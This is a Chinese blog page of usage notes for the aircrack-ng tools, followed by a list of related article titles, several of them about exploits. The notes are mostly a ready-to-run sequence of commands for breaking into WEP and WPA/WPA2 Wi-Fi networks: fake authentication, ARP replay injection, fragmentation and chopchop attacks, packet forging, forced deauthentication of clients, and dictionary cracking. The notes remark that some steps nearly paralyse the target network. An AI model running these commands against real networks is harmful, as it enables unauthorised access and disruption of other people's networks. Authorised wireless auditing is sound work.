当前位置: 首页 > news >正文

aircrack-ng 系列工具使用笔记

初始化工作

airmon-ng start wlan0 9

打开一个网卡监听设备,并设置到channel 9; channel可用iwconfig修改

airodump-ng mon0

无参数启动airodump-ng可查看所有接收范围内的AP、Client信息

aireplay-ng -9 -e (bssid) -a (AP Mac) ath0

测试注入攻击链路质量

airodump-ng -c (channel) --bssid (AP Mac) -w output ath0

监听AP在频道的所有数据包并保存到output文件,此步应在以下步骤提到airodump的时候执行
WEP:

aireplay-ng -1 0 -e (bssid) -a (AP Mac) -h (Host Mac) ath0

伪认证联机请求

aireplay-ng -1 6000 -o 1 -q 10 -e (bssid) -a (AP Mac) -h (Host Mac) ath0

伪认证联机请求并发送保持在线数据

airodump-ng -c (channel) --bssid (AP Mac) -w output ath0

监听收集

aireplay-ng -3 -b (AP Mac) -h (Host Mac) ath0

监听arp报文,一旦出现就不断将该报文重发,使目标机器产生实际回应数据,发回更多IV数据。
此时若有“内奸”,即有可控制的已经连接在目标网段的机器,ping一个网段内不存在的IP即可产生这样一个arp报文,接下来可以运行aircrack破解了。注意这个步骤可能会对目标局域网产生类似ARP洪水攻击一样的效果,网内数据延时丢包都很严重。
对于无机器连接的WEP:

aireplay-ng -5 -b (AP Mac) -h (Host Mac) ath0

Fragmenation攻击,监听一个AP广播出来的数据包,并抽离有效的伪随机数据(PRGA),保存到fragment-XXXX-XXXXX.xor文件供下一步使用.
有时监听到的不是广播包,转发攻击后ap没有回应,一系列重试后程序会重新监听; 有时候可能需要不少时间,加-F参数可以自动应答。

aireplay-ng -4 -h 00:09:5B:EC:EE:F2 -b 00:14:6C:7E:40:80 ath0 

chopchop攻击,上述攻击不奏效可试,相同作用

packetforge-ng -0 -a (AP Mac) -h (Host Mac) -k 255.255.255.255 -l 255.255.255.255 -y fragment-0203-180343.xor -w arp-request

根据fragment-0203-180343.xor文件的PRGA,产生arp请求包,保存到arp-request文件

使用-k 192.168.1.1 -l 10.255.255.255可使AP产生两倍的有效IV,192.168.1.1为确实存在的IP,通常的网关
使用-k 192.168.1.89 -l 10.255.255.255可使AP产生三倍的有效IV,192.168.1.89为确实存在的客户端IP

airodump-ng -c (channel) --bssid (AP Mac) -w output ath0

监听收集

aireplay-ng -2 -r arp-request ath0

不断注入上述产生的arp-request报文
这一步也会使目标网络接近瘫痪,极大延时,丢包。

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (AP Map) -h (Host Mac) ath0

上述产生、发送arp-request的步骤可由这一步替换,这是转发任何一个收到的有效数据包,方便,缺点是若数据包较大,转发过程较慢。还可使用-r capture-01.cap读取以前读取的有效数据进行转发注入。

aircrack-ng -b (AP Mac) capture*.cap 

解密

aircrack-ng -b (AP Mac) capture*.cap 

另一种解密算法
WPA/WPA2:

airodump-ng -c (channel) --bssid (AP Mac) -w output ath0

监听捕捉另外一客户端与ap之间的连接,上方出现WPA handshake: xx:xx...为成功

aireplay-ng -0 1 -a (AP Mac) -c (The Mac of a connected client) ath0

往已经连接到ap的一个客户端伪造一个离线包,使其离线重连以便捕捉handshake.
注意要收到ACK,才表明被攻击客户端收到,才会下线;发送离线不宜过密过多。

aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 output*.cap

暴力破解。password.lst为密码字典,破解的成功率取决于字典的覆盖程度以及机器的速度。

相关文章:

  • 外围渗透测试的一些小领悟
  • Windows下使用skipfish
  • Oracle11g日志查看方法
  • 通杀IIS7.0畸形解析0day漏洞
  • 人人都能做PHP简易留言板
  • Discuz x1.5 – x2版本 二次注射
  • 网络风险评估与大致流程
  • Joomla Component com_bch LFI Vulnerability
  • IIS“页面无法显示”的故障及其解决方法
  • Linux服务器安全配置
  • sqlmap使用文档
  • MSSQL2008一句话启用xp_cmdshell
  • web脆弱性评估漏洞利用
  • Web Application Firewall Bypasses and PHP Exploit
  • 利用Acunetix WVS进行批量网站漏洞评估
  • 实现windows 窗体的自己画,网上摘抄的,学习了
  • [微信小程序] 使用ES6特性Class后出现编译异常
  • 【刷算法】求1+2+3+...+n
  • angular组件开发
  • ES6之路之模块详解
  • httpie使用详解
  • Java小白进阶笔记(3)-初级面向对象
  • jquery cookie
  • Js基础知识(一) - 变量
  • mysql外键的使用
  • nginx 配置多 域名 + 多 https
  • pdf文件如何在线转换为jpg图片
  • Python进阶细节
  • SpringCloud(第 039 篇)链接Mysql数据库,通过JpaRepository编写数据库访问
  • Transformer-XL: Unleashing the Potential of Attention Models
  • tweak 支持第三方库
  • Vue.js-Day01
  • - 概述 - 《设计模式(极简c++版)》
  • 基于Volley网络库实现加载多种网络图片(包括GIF动态图片、圆形图片、普通图片)...
  • 利用jquery编写加法运算验证码
  • 强力优化Rancher k8s中国区的使用体验
  • 手写双向链表LinkedList的几个常用功能
  • 用jQuery怎么做到前后端分离
  • 与 ConTeXt MkIV 官方文档的接驳
  • ​中南建设2022年半年报“韧”字当头,经营性现金流持续为正​
  • #Js篇:单线程模式同步任务异步任务任务队列事件循环setTimeout() setInterval()
  • #Ubuntu(修改root信息)
  • #大学#套接字
  • (173)FPGA约束:单周期时序分析或默认时序分析
  • (6)STL算法之转换
  • (独孤九剑)--文件系统
  • (附源码)spring boot基于小程序酒店疫情系统 毕业设计 091931
  • (五)IO流之ByteArrayInput/OutputStream
  • (最简单,详细,直接上手)uniapp/vue中英文多语言切换
  • .Net(C#)自定义WinForm控件之小结篇
  • .net/c# memcached 获取所有缓存键(keys)
  • .NET关于 跳过SSL中遇到的问题
  • .net实现头像缩放截取功能 -----转载自accp教程网
  • .net之微信企业号开发(一) 所使用的环境与工具以及准备工作
  • ::前边啥也没有